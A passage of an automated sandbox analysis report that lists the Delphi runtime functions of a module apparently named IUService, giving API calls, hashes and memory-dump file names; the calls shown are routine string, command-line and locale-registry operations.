                                                                                                                                            • Source File: 00000022.00000002.2346383362.0000000050001000.00000020.00000001.01000000.0000000E.sdmp, Offset: 50000000, based on PE: true
                                                                                                                                            • Associated: 00000022.00000002.2346348283.0000000050000000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                            • Associated: 00000022.00000002.2347614191.000000005009C000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                            • Associated: 00000022.00000002.2347666251.000000005009D000.00000008.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                            • Associated: 00000022.00000002.2347844466.00000000500AA000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                            • Associated: 00000022.00000002.2347882113.00000000500AB000.00000008.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                            • Associated: 00000022.00000002.2347930538.00000000500AD000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                            • Associated: 00000022.00000002.2347930538.00000000500FD000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                            • Associated: 00000022.00000002.2347930538.0000000050113000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_34_2_50000000_IUService.jbxd
                                                                                                                                            Yara matches
                                                                                                                                            Similarity
                                                                                                                                            • API ID: System@$Unicode$System@@$String$Sysutils@$File$Char$qqrr20FromStringpbStringx20$ExtractName$qqrx20Stringt1$Asg$qqrr20Cat$qqrr20Drive$qqrx20N$qqrvSameString$qqrr20Unique$AnsiClr$qqrpvCopy$qqrx20Delimiter$qqrx20LastLength$qqrr20Move$qqrpxvpviScan$qqrpbbStringiStringii
                                                                                                                                            • String ID:
                                                                                                                                            • API String ID: 178390892-0
                                                                                                                                            • Opcode ID: 5cf03c4f51f339b5190f70d2a39a3b1a4e70701528fcd71156b8032a35829f8d
                                                                                                                                            • Instruction ID: 482c5ae77d457f58d2c42465c16c4b49129206617ce66a2e08880273dab9e065
                                                                                                                                            • Opcode Fuzzy Hash: 5cf03c4f51f339b5190f70d2a39a3b1a4e70701528fcd71156b8032a35829f8d
                                                                                                                                            • Instruction Fuzzy Hash: 26414234A01A99ABDB01DBD4EC91ADEB3B5EF68200F504637F510A3241DB74DE868B91
                                                                                                                                            Function 50029604 Relevance: 27.2, APIs: 18, Instructions: 238COMMON
                                                                                                                                            Download Yara Rule
                                                                                                                                            APIs
                                                                                                                                            • @System@@InternalUStrFromLStr$qqrr20System@UnicodeStringx27System@%AnsiStringT$us$i0$%.RTL120(00000000,500298F5), ref: 50029676
                                                                                                                                              • Part of subcall function 50008994: @System@@UStrFromLStr$qqrr20System@UnicodeStringx27System@%AnsiStringT$us$i0$%.RTL120(?,500089BC,50006B15,00000000,50006B69), ref: 50008999
                                                                                                                                            • @System@@InternalUStrFromLStr$qqrr20System@UnicodeStringx27System@%AnsiStringT$us$i0$%.RTL120(00000000,500298F5), ref: 5002969F
                                                                                                                                            • @System@@UStrAsg$qqrr20System@UnicodeStringx20System@UnicodeString.RTL120(00000000,500298F5), ref: 500296B5
                                                                                                                                            • @System@@InternalUStrFromLStr$qqrr20System@UnicodeStringx27System@%AnsiStringT$us$i0$%.RTL120(00000000,500298F5), ref: 500296DB
                                                                                                                                            • @Sysutils@CharLength$qqrx20System@UnicodeStringi.RTL120(00000000,500298F5), ref: 500296FA
                                                                                                                                            • @System@@InternalUStrFromLStr$qqrr20System@UnicodeStringx27System@%AnsiStringT$us$i0$%.RTL120(00000000,500298F5), ref: 50029764
                                                                                                                                            • @System@@UStrToPWChar$qqrx20System@UnicodeString.RTL120(00000000,500298F5), ref: 50029777
                                                                                                                                            • @Sysutils@StrLComp$qqrpxbt1ui.RTL120(00000000,500298F5), ref: 50029786
                                                                                                                                            • @System@@UStrCopy$qqrx20System@UnicodeStringii.RTL120(?,00000000,500298F5), ref: 5002980F
                                                                                                                                            • @System@@UStrCat$qqrr20System@UnicodeStringx20System@UnicodeString.RTL120(?,00000000,500298F5), ref: 5002981A
                                                                                                                                            • @Sysutils@StrLComp$qqrpxbt1ui.RTL120(?,00000000,500298F5), ref: 50029864
                                                                                                                                            • @System@@UStrCat$qqrr20System@UnicodeStringx20System@UnicodeString.RTL120(?,00000000,500298F5), ref: 5002988A
                                                                                                                                            • @System@@UStrCopy$qqrx20System@UnicodeStringii.RTL120(?,00000000,500298F5), ref: 500298BA
                                                                                                                                            • @System@@UStrCat$qqrr20System@UnicodeStringx20System@UnicodeString.RTL120(?,00000000,500298F5), ref: 500298C5
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000022.00000002.2346383362.0000000050001000.00000020.00000001.01000000.0000000E.sdmp, Offset: 50000000, based on PE: true
                                                                                                                                            • Associated: 00000022.00000002.2346348283.0000000050000000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                            • Associated: 00000022.00000002.2347614191.000000005009C000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                            • Associated: 00000022.00000002.2347666251.000000005009D000.00000008.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                            • Associated: 00000022.00000002.2347844466.00000000500AA000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                            • Associated: 00000022.00000002.2347882113.00000000500AB000.00000008.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                            • Associated: 00000022.00000002.2347930538.00000000500AD000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                            • Associated: 00000022.00000002.2347930538.00000000500FD000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                            • Associated: 00000022.00000002.2347930538.0000000050113000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_34_2_50000000_IUService.jbxd
                                                                                                                                            Yara matches
                                                                                                                                            Similarity
                                                                                                                                            • API ID: System@Unicode$System@@$String$AnsiFromStr$qqrr20Stringx27System@%T$us$i0$%$InternalStringx20$Cat$qqrr20Sysutils@$Comp$qqrpxbt1uiCopy$qqrx20Stringii$Asg$qqrr20CharChar$qqrx20Length$qqrx20Stringi
                                                                                                                                            • String ID:
                                                                                                                                            • API String ID: 873705688-0
                                                                                                                                            • Opcode ID: 253641eb34a4d143ab3a2581e42b7379e36710be684173b05d6945abe8d2afe8
                                                                                                                                            • Instruction ID: be51fb8424686403522dc7b40415ecc70bc72e8b18d73c36ef70b9aef3598e1a
                                                                                                                                            • Opcode Fuzzy Hash: 253641eb34a4d143ab3a2581e42b7379e36710be684173b05d6945abe8d2afe8
                                                                                                                                            • Instruction Fuzzy Hash: 24A13934D1228A9FDF00DFA8E985AEEB7F1FF49300FA44266E404A7251D7749E81CB94
                                                                                                                                            Function 50029964 Relevance: 27.2, APIs: 18, Instructions: 178COMMON
                                                                                                                                            Download Yara Rule
                                                                                                                                            APIs
                                                                                                                                            • @System@ParamCount$qqrv.RTL120(00000000,50029B78), ref: 50029994
                                                                                                                                              • Part of subcall function 500046CC: GetCommandLineW.KERNEL32(00000000,5000471D,?,?,?,00000000), ref: 500046E3
                                                                                                                                            • @System@ParamStr$qqri.RTL120(00000000,50029B78), ref: 500299AD
                                                                                                                                              • Part of subcall function 5000472C: @System@@UStrAsg$qqrr20System@UnicodeStringx20System@UnicodeString.RTL120 ref: 5000473D
                                                                                                                                              • Part of subcall function 5000472C: GetModuleFileNameW.KERNEL32(00000000,?,00000105), ref: 50004752
                                                                                                                                              • Part of subcall function 5000472C: @System@@UStrFromPWCharLen$qqrr20System@UnicodeStringpbi.RTL120(00000000,?,00000105), ref: 5000475D
                                                                                                                                            • @System@@SetEq$qqrv.RTL120(00000000,50029B78), ref: 500299BB
                                                                                                                                            • @System@@UStrCopy$qqrx20System@UnicodeStringii.RTL120(?,00000000,50029B78), ref: 500299F5
                                                                                                                                            • @System@@UStrLAsg$qqrr20System@UnicodeStringx20System@UnicodeString.RTL120(?,00000000,50029B78), ref: 50029A00
                                                                                                                                            • @System@@InternalUStrFromLStr$qqrr20System@UnicodeStringx27System@%AnsiStringT$us$i0$%.RTL120(?,00000000,50029B78), ref: 50029A1D
                                                                                                                                            • @System@@InternalUStrFromLStr$qqrr20System@UnicodeStringx27System@%AnsiStringT$us$i0$%.RTL120(?,00000000,50029B78), ref: 50029A4E
                                                                                                                                            • @System@@UStrToPWChar$qqrx20System@UnicodeString.RTL120(00000000,?,00000000,50029B78), ref: 50029A6E
                                                                                                                                            • @System@@UStrToPWChar$qqrx20System@UnicodeString.RTL120(00000000,00000000,00000000,?,00000000,50029B78), ref: 50029A7B
                                                                                                                                            • CompareStringW.KERNEL32(00000400,00000001,00000000,00000000,00000000,00000000,?,00000000,50029B78), ref: 50029A88
                                                                                                                                            • @System@@UStrCopy$qqrx20System@UnicodeStringii.RTL120(?,00000000,50029B78), ref: 50029AB0
                                                                                                                                            • @System@@UStrLAsg$qqrr20System@UnicodeStringx20System@UnicodeString.RTL120(?,00000000,50029B78), ref: 50029ABB
                                                                                                                                            • @System@@InternalUStrFromLStr$qqrr20System@UnicodeStringx27System@%AnsiStringT$us$i0$%.RTL120(?,00000000,50029B78), ref: 50029AD8
                                                                                                                                            • @System@@InternalUStrFromLStr$qqrr20System@UnicodeStringx27System@%AnsiStringT$us$i0$%.RTL120(?,00000000,50029B78), ref: 50029B09
                                                                                                                                            • @System@@UStrToPWChar$qqrx20System@UnicodeString.RTL120(00000000,?,00000000,50029B78), ref: 50029B29
                                                                                                                                            • @System@@UStrToPWChar$qqrx20System@UnicodeString.RTL120(00000000,00000000,00000000,?,00000000,50029B78), ref: 50029B36
                                                                                                                                            • CompareStringW.KERNEL32(00000400,00000000,00000000,00000000,00000000,00000000,?,00000000,50029B78), ref: 50029B43
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000022.00000002.2346383362.0000000050001000.00000020.00000001.01000000.0000000E.sdmp, Offset: 50000000, based on PE: true
                                                                                                                                            • Associated: 00000022.00000002.2346348283.0000000050000000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                            • Associated: 00000022.00000002.2347614191.000000005009C000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                            • Associated: 00000022.00000002.2347666251.000000005009D000.00000008.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                            • Associated: 00000022.00000002.2347844466.00000000500AA000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                            • Associated: 00000022.00000002.2347882113.00000000500AB000.00000008.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                            • Associated: 00000022.00000002.2347930538.00000000500AD000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                            • Associated: 00000022.00000002.2347930538.00000000500FD000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                            • Associated: 00000022.00000002.2347930538.0000000050113000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_34_2_50000000_IUService.jbxd
                                                                                                                                            Yara matches
                                                                                                                                            Similarity
                                                                                                                                            • API ID: System@$Unicode$System@@$String$From$AnsiChar$qqrx20InternalStr$qqrr20Stringx27System@%T$us$i0$%$Asg$qqrr20Stringx20$CompareCopy$qqrx20ParamStringii$CharCommandCount$qqrvEq$qqrvFileLen$qqrr20LineModuleNameStr$qqriStringpbi
                                                                                                                                            • String ID:
                                                                                                                                            • API String ID: 3651759711-0
                                                                                                                                            • Opcode ID: cd5cc04ada734ffdd08278c1e4b726aaa89d04c5e2e3be0d58094f2489661b81
                                                                                                                                            • Instruction ID: c09673ee74d34fb23c294186d7525fae2e6e01a2bf152108c741f07823023258
                                                                                                                                            • Opcode Fuzzy Hash: cd5cc04ada734ffdd08278c1e4b726aaa89d04c5e2e3be0d58094f2489661b81
                                                                                                                                            • Instruction Fuzzy Hash: 3A613970E0128A9FDF01DFA8E981AEEB7F9EF48300F904266E504E7251E7749D41CBA5
                                                                                                                                            Function 5001A8EC Relevance: 27.1, APIs: 18, Instructions: 142COMMON
                                                                                                                                            Download Yara Rule
                                                                                                                                            APIs
                                                                                                                                            • @System@@UStrToPWChar$qqrx20System@UnicodeString.RTL120(00000000,5001AA7C), ref: 5001A921
                                                                                                                                            • @Sysutils@AnsiStrScan$qqrpbb.RTL120(00000000,5001AA7C), ref: 5001A92A
                                                                                                                                            • @Sysutils@AnsiStrScan$qqrpbb.RTL120(00000000,5001AA7C), ref: 5001A93F
                                                                                                                                            • @System@@UStrFromWChar$qqrr20System@UnicodeStringb.RTL120(00000000,5001AA7C), ref: 5001A955
                                                                                                                                            • @System@@UStrFromWChar$qqrr20System@UnicodeStringb.RTL120(?,?,00000000,5001AA7C), ref: 5001A967
                                                                                                                                            • @System@@UStrCatN$qqrv.RTL120(?,?,?,00000000,5001AA7C), ref: 5001A976
                                                                                                                                            • @System@@InternalUStrFromLStr$qqrr20System@UnicodeStringx27System@%AnsiStringT$us$i0$%.RTL120(00000000,5001AA7C), ref: 5001A998
                                                                                                                                            • @System@@UStrSetLength$qqrr20System@UnicodeStringi.RTL120(00000000,5001AA7C), ref: 5001A9AC
                                                                                                                                            • @System@@UStrToPWChar$qqrx20System@UnicodeString.RTL120(00000000,5001AA7C), ref: 5001A9B3
                                                                                                                                            • @System@@UStrToPWChar$qqrx20System@UnicodeString.RTL120(00000000,5001AA7C), ref: 5001A9C7
                                                                                                                                            • @Sysutils@AnsiStrScan$qqrpbb.RTL120(00000000,5001AA7C), ref: 5001A9D4
                                                                                                                                            • @System@Move$qqrpxvpvi.RTL120(00000000,5001AA7C), ref: 5001A9F1
                                                                                                                                            • @Sysutils@AnsiStrScan$qqrpbb.RTL120(00000000,5001AA7C), ref: 5001AA17
                                                                                                                                            • @Sysutils@StrEnd$qqrpxb.RTL120(00000000,5001AA7C), ref: 5001AA24
                                                                                                                                            • @System@Move$qqrpxvpvi.RTL120(00000000,5001AA7C), ref: 5001AA3E
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000022.00000002.2346383362.0000000050001000.00000020.00000001.01000000.0000000E.sdmp, Offset: 50000000, based on PE: true
                                                                                                                                            • Associated: 00000022.00000002.2346348283.0000000050000000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                            • Associated: 00000022.00000002.2347614191.000000005009C000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                            • Associated: 00000022.00000002.2347666251.000000005009D000.00000008.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                            • Associated: 00000022.00000002.2347844466.00000000500AA000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                            • Associated: 00000022.00000002.2347882113.00000000500AB000.00000008.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                            • Associated: 00000022.00000002.2347930538.00000000500AD000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                            • Associated: 00000022.00000002.2347930538.00000000500FD000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                            • Associated: 00000022.00000002.2347930538.0000000050113000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_34_2_50000000_IUService.jbxd
                                                                                                                                            Yara matches
                                                                                                                                            Similarity
                                                                                                                                            • API ID: System@$System@@$Unicode$AnsiSysutils@$Scan$qqrpbbString$Char$qqrx20From$Char$qqrr20Move$qqrpxvpviStringb$End$qqrpxbInternalLength$qqrr20N$qqrvStr$qqrr20StringiStringx27System@%T$us$i0$%
                                                                                                                                            • String ID:
                                                                                                                                            • API String ID: 3100482041-0
                                                                                                                                            • Opcode ID: ac5933cb5126ba6906b8115a9258b9b4bc1d021dfbd3a256c5a20e56419a4f34
                                                                                                                                            • Instruction ID: e71aa64f505d5f3bb0e37b2848e98b16ac34cbcc8d436ff160d5d4550b390a29
                                                                                                                                            • Opcode Fuzzy Hash: ac5933cb5126ba6906b8115a9258b9b4bc1d021dfbd3a256c5a20e56419a4f34
                                                                                                                                            • Instruction Fuzzy Hash: C941C021B012A69BDB019BE9DC912AEB3F5AF58200F944636E840D7352EB38DE418391
                                                                                                                                            Function 5002944C Relevance: 27.1, APIs: 18, Instructions: 139COMMON
                                                                                                                                            Download Yara Rule
                                                                                                                                            APIs
                                                                                                                                            • @Sysutils@AnsiUpperCase$qqrx20System@UnicodeString.RTL120(00000000,500295F1), ref: 5002948C
                                                                                                                                              • Part of subcall function 50019EBC: @System@@InternalUStrFromLStr$qqrr20System@UnicodeStringx27System@%AnsiStringT$us$i0$%.RTL120(00000000,50019F40,?,?,?,?,?,500154E1,00000000,5001551A,?,?,?,00000000,00000000), ref: 50019EF5
                                                                                                                                              • Part of subcall function 50019EBC: @System@@UStrToPWChar$qqrx20System@UnicodeString.RTL120(00000000,50019F40,?,?,?,?,?,500154E1,00000000,5001551A,?,?,?,00000000,00000000), ref: 50019F08
                                                                                                                                              • Part of subcall function 50019EBC: @System@@UStrFromPWCharLen$qqrr20System@UnicodeStringpbi.RTL120(00000000,50019F40,?,?,?,?,?,500154E1,00000000,5001551A,?,?,?,00000000,00000000), ref: 50019F13
                                                                                                                                              • Part of subcall function 50019EBC: @System@@UStrToPWChar$qqrx20System@UnicodeString.RTL120(?,00000000,50019F40,?,?,?,?,?,500154E1,00000000,5001551A,?,?,?,00000000,00000000), ref: 50019F1F
                                                                                                                                              • Part of subcall function 50019EBC: CharUpperBuffW.USER32(00000000,?,00000000,50019F40,?,?,?,?,?,500154E1,00000000,5001551A,?,?,?,00000000), ref: 50019F25
                                                                                                                                            • @Sysutils@AnsiUpperCase$qqrx20System@UnicodeString.RTL120(00000000,500295F1), ref: 50029497
                                                                                                                                            • @System@@UStrLAsg$qqrr20System@UnicodeStringx20System@UnicodeString.RTL120(00000000,500295F1), ref: 500294A3
                                                                                                                                            • @System@@UStrLAsg$qqrr20System@UnicodeStringx20System@UnicodeString.RTL120(00000000,500295F1), ref: 500294AE
                                                                                                                                            • @System@@UStrLAsg$qqrr20System@UnicodeStringx20System@UnicodeString.RTL120(00000000,500295F1), ref: 500294B8
                                                                                                                                            • @System@@UStrAsg$qqrr20System@UnicodeStringx20System@UnicodeString.RTL120(00000000,500295F1), ref: 500294C2
                                                                                                                                            • @Sysutils@AnsiPos$qqrx20System@UnicodeStringt1.RTL120(00000000,500295F1), ref: 500294D2
                                                                                                                                              • Part of subcall function 50028754: @System@@InternalUStrFromLStr$qqrr20System@UnicodeStringx27System@%AnsiStringT$us$i0$%.RTL120(00000000,50028822), ref: 5002879B
                                                                                                                                              • Part of subcall function 50028754: @System@@InternalUStrFromLStr$qqrr20System@UnicodeStringx27System@%AnsiStringT$us$i0$%.RTL120(00000000,50028822), ref: 500287C3
                                                                                                                                              • Part of subcall function 50028754: @System@@UStrToPWChar$qqrx20System@UnicodeString.RTL120(?,00000000,50028822), ref: 500287D7
                                                                                                                                              • Part of subcall function 50028754: @System@@UStrToPWChar$qqrx20System@UnicodeString.RTL120(00000000,?,00000000,50028822), ref: 500287E0
                                                                                                                                              • Part of subcall function 50028754: @System@@UStrToPWChar$qqrx20System@UnicodeString.RTL120(?,00000000,50028822), ref: 500287F6
                                                                                                                                            • @System@@UStrCat$qqrr20System@UnicodeStringx20System@UnicodeString.RTL120(00000000,500295F1), ref: 500294E3
                                                                                                                                              • Part of subcall function 5000A164: @System@@UStrSetLength$qqrr20System@UnicodeStringi.RTL120 ref: 5000A18D
                                                                                                                                              • Part of subcall function 5000A164: @System@@UStrAsg$qqrr20System@UnicodeStringx20System@UnicodeString.RTL120(00000000), ref: 5000A1A4
                                                                                                                                              • Part of subcall function 5000A164: @System@Move$qqrpxvpvi.RTL120(00000000), ref: 5000A1B7
                                                                                                                                              • Part of subcall function 5000A164: @System@@LStrClr$qqrpv.RTL120(00000000), ref: 5000A1C4
                                                                                                                                            • @System@@UStrCopy$qqrx20System@UnicodeStringii.RTL120(?,00000000,00000000,500295F1), ref: 50029504
                                                                                                                                            • @System@@UStrCatN$qqrv.RTL120(?,?,?,00000000,00000000,500295F1), ref: 50029517
                                                                                                                                            • @System@@InternalUStrFromLStr$qqrr20System@UnicodeStringx27System@%AnsiStringT$us$i0$%.RTL120(?,?,?,00000000,00000000,500295F1), ref: 50029534
                                                                                                                                            • @System@@UStrCopy$qqrx20System@UnicodeStringii.RTL120(?,?,?,?,00000000,00000000,500295F1), ref: 50029560
                                                                                                                                            • @System@@UStrCat$qqrr20System@UnicodeStringx20System@UnicodeString.RTL120(?,?,?,?,00000000,00000000,500295F1), ref: 50029571
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000022.00000002.2346383362.0000000050001000.00000020.00000001.01000000.0000000E.sdmp, Offset: 50000000, based on PE: true
                                                                                                                                            • Associated: 00000022.00000002.2346348283.0000000050000000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                            • Associated: 00000022.00000002.2347614191.000000005009C000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                            • Associated: 00000022.00000002.2347666251.000000005009D000.00000008.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                            • Associated: 00000022.00000002.2347844466.00000000500AA000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                            • Associated: 00000022.00000002.2347882113.00000000500AB000.00000008.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                            • Associated: 00000022.00000002.2347930538.00000000500AD000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                            • Associated: 00000022.00000002.2347930538.00000000500FD000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                            • Associated: 00000022.00000002.2347930538.0000000050113000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_34_2_50000000_IUService.jbxd
                                                                                                                                            Yara matches
                                                                                                                                            Similarity
                                                                                                                                            • API ID: System@$Unicode$System@@$String$AnsiStringx20$Asg$qqrr20Char$qqrx20From$InternalStr$qqrr20Stringx27System@%T$us$i0$%$Sysutils@Upper$Case$qqrx20Cat$qqrr20CharCopy$qqrx20Stringii$BuffClr$qqrpvLen$qqrr20Length$qqrr20Move$qqrpxvpviN$qqrvPos$qqrx20StringiStringpbiStringt1
                                                                                                                                            • String ID:
                                                                                                                                            • API String ID: 2621940507-0
                                                                                                                                            • Opcode ID: ff1345ccb1cb74fbf93f5664dae3af5beed445668d21275d9704c0a32d1a5c61
                                                                                                                                            • Instruction ID: c8ac3393b34f38ec1835f6db0b975786c4e5aa466663b261a48470ebfa86302d
                                                                                                                                            • Opcode Fuzzy Hash: ff1345ccb1cb74fbf93f5664dae3af5beed445668d21275d9704c0a32d1a5c61
                                                                                                                                            • Instruction Fuzzy Hash: 24513930A0269A9FDF01DF98E8819DEB7B5FF49300F90866AE914A7255D734AE45CB80
                                                                                                                                            Function 5001D338 Relevance: 26.4, APIs: 14, Strings: 1, Instructions: 119COMMON
                                                                                                                                            Download Yara Rule
                                                                                                                                            APIs
                                                                                                                                            • @System@@UStrAsg$qqrr20System@UnicodeStringx20System@UnicodeString.RTL120(00000000,5001D4A4), ref: 5001D366
                                                                                                                                            • @System@@InternalUStrFromLStr$qqrr20System@UnicodeStringx27System@%AnsiStringT$us$i0$%.RTL120(00000000,5001D4A4), ref: 5001D394
                                                                                                                                              • Part of subcall function 50008994: @System@@UStrFromLStr$qqrr20System@UnicodeStringx27System@%AnsiStringT$us$i0$%.RTL120(?,500089BC,50006B15,00000000,50006B69), ref: 50008999
                                                                                                                                            • @Sysutils@FileExists$qqrx20System@UnicodeString.RTL120(00000000,5001D4A4), ref: 5001D3A9
                                                                                                                                            • @System@@EnsureUnicodeString$qqrr20System@UnicodeString.RTL120(?,00000000,5001D4A4), ref: 5001D3C0
                                                                                                                                            • @System@@InternalUStrFromLStr$qqrr20System@UnicodeStringx27System@%AnsiStringT$us$i0$%.RTL120(?,00000000,5001D4A4), ref: 5001D3F2
                                                                                                                                            • @Sysutils@NextCharIndex$qqrx20System@UnicodeStringi.RTL120(?,00000000,5001D4A4), ref: 5001D410
                                                                                                                                            • @System@@EnsureUnicodeString$qqrr20System@UnicodeString.RTL120(?,00000000,5001D4A4), ref: 5001D421
                                                                                                                                            • @System@@UStrCopy$qqrx20System@UnicodeStringii.RTL120(?,00000000,5001D4A4), ref: 5001D43D
                                                                                                                                            • @Sysutils@AnsiLastChar$qqrx20System@UnicodeString.RTL120(?,00000000,5001D4A4), ref: 5001D447
                                                                                                                                            • @System@@UStrCat$qqrr20System@UnicodeStringx20System@UnicodeString.RTL120(?,?,00000000,5001D4A4), ref: 5001D469
                                                                                                                                            • @System@@UStrCat$qqrr20System@UnicodeStringx20System@UnicodeString.RTL120(?,00000000,5001D4A4), ref: 5001D477
                                                                                                                                            • @System@@UStrAsg$qqrr20System@UnicodeStringx20System@UnicodeString.RTL120(00000000,5001D4A4), ref: 5001D489
                                                                                                                                            Strings
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000022.00000002.2346383362.0000000050001000.00000020.00000001.01000000.0000000E.sdmp, Offset: 50000000, based on PE: true
                                                                                                                                            • Associated: 00000022.00000002.2346348283.0000000050000000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                            • Associated: 00000022.00000002.2347614191.000000005009C000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                            • Associated: 00000022.00000002.2347666251.000000005009D000.00000008.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                            • Associated: 00000022.00000002.2347844466.00000000500AA000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                            • Associated: 00000022.00000002.2347882113.00000000500AB000.00000008.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                            • Associated: 00000022.00000002.2347930538.00000000500AD000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                            • Associated: 00000022.00000002.2347930538.00000000500FD000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                            • Associated: 00000022.00000002.2347930538.0000000050113000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_34_2_50000000_IUService.jbxd
                                                                                                                                            Yara matches
                                                                                                                                            Similarity
                                                                                                                                            • API ID: Unicode$System@$String$System@@$AnsiStringx20$FromStr$qqrr20Stringx27System@%Sysutils@T$us$i0$%$Asg$qqrr20Cat$qqrr20EnsureInternalString$qqrr20$CharChar$qqrx20Copy$qqrx20Exists$qqrx20FileIndex$qqrx20LastNextStringiStringii
                                                                                                                                            • String ID: \
                                                                                                                                            • API String ID: 1823336666-2967466578
                                                                                                                                            • Opcode ID: df0ab2c0c2f59ba5373b8656c7223b6ccec50d516bfc707d398026b4c07643d9
                                                                                                                                            • Instruction ID: 6d0a0c84b3d9e99a300f93f86f148e16fca29f9739a9876171c5e92ec0c1f276
                                                                                                                                            • Opcode Fuzzy Hash: df0ab2c0c2f59ba5373b8656c7223b6ccec50d516bfc707d398026b4c07643d9
                                                                                                                                            • Instruction Fuzzy Hash: 2C417134E00989DFDB10EFA8D99289EB3F1EF44300B5082A7E510E7221D770AF86D791
                                                                                                                                            Function 5002A794 Relevance: 26.4, APIs: 14, Strings: 1, Instructions: 106librarywindowCOMMON
                                                                                                                                            Download Yara Rule
                                                                                                                                            APIs
                                                                                                                                            • @System@@UStrAsg$qqrr20System@UnicodeStringx20System@UnicodeString.RTL120(00000000,5002A8E2), ref: 5002A7B7
                                                                                                                                            • @System@LoadResourceModule$qqrpbo.RTL120(00000000,5002A8E2), ref: 5002A7C4
                                                                                                                                              • Part of subcall function 5000C58C: GetModuleFileNameW.KERNEL32(00000000,?,00000105,50120000,50242008), ref: 5000C5A8
                                                                                                                                              • Part of subcall function 5000C58C: RegOpenKeyExW.ADVAPI32(80000001,Software\CodeGear\Locales,00000000,000F0019,?,00000000,?,00000105,50120000,50242008), ref: 5000C5C8
                                                                                                                                              • Part of subcall function 5000C58C: RegOpenKeyExW.ADVAPI32(80000002,Software\CodeGear\Locales,00000000,000F0019,?,80000001,Software\CodeGear\Locales,00000000,000F0019,?,00000000,?,00000105,50120000,50242008), ref: 5000C5E6
                                                                                                                                              • Part of subcall function 5000C58C: RegOpenKeyExW.ADVAPI32(80000001,Software\Borland\Locales,00000000,000F0019,?,80000002,Software\CodeGear\Locales,00000000,000F0019,?,80000001,Software\CodeGear\Locales,00000000,000F0019,?,00000000), ref: 5000C604
                                                                                                                                              • Part of subcall function 5000C58C: RegOpenKeyExW.ADVAPI32(80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?,80000001,Software\Borland\Locales,00000000,000F0019,?,80000002,Software\CodeGear\Locales,00000000,000F0019,?,80000001), ref: 5000C622
                                                                                                                                              • Part of subcall function 5000C58C: RegQueryValueExW.ADVAPI32(?,?,00000000,00000000,?,?,00000000,5000C6C0,?,80000001,Software\CodeGear\Locales,00000000,000F0019,?,00000000,?), ref: 5000C66B
                                                                                                                                              • Part of subcall function 5000C58C: RegQueryValueExW.ADVAPI32(?,5000C8B4,00000000,00000000,?,?,?,?,00000000,00000000,?,?,00000000,5000C6C0,?,80000001), ref: 5000C689
                                                                                                                                              • Part of subcall function 5000C58C: RegCloseKey.ADVAPI32(?,5000C6C7,00000000,?,?,00000000,5000C6C0,?,80000001,Software\CodeGear\Locales,00000000,000F0019,?,00000000,?,00000105), ref: 5000C6BA
                                                                                                                                            • GetModuleHandleW.KERNEL32(?,00000000,5002A8E2), ref: 5002A7D3
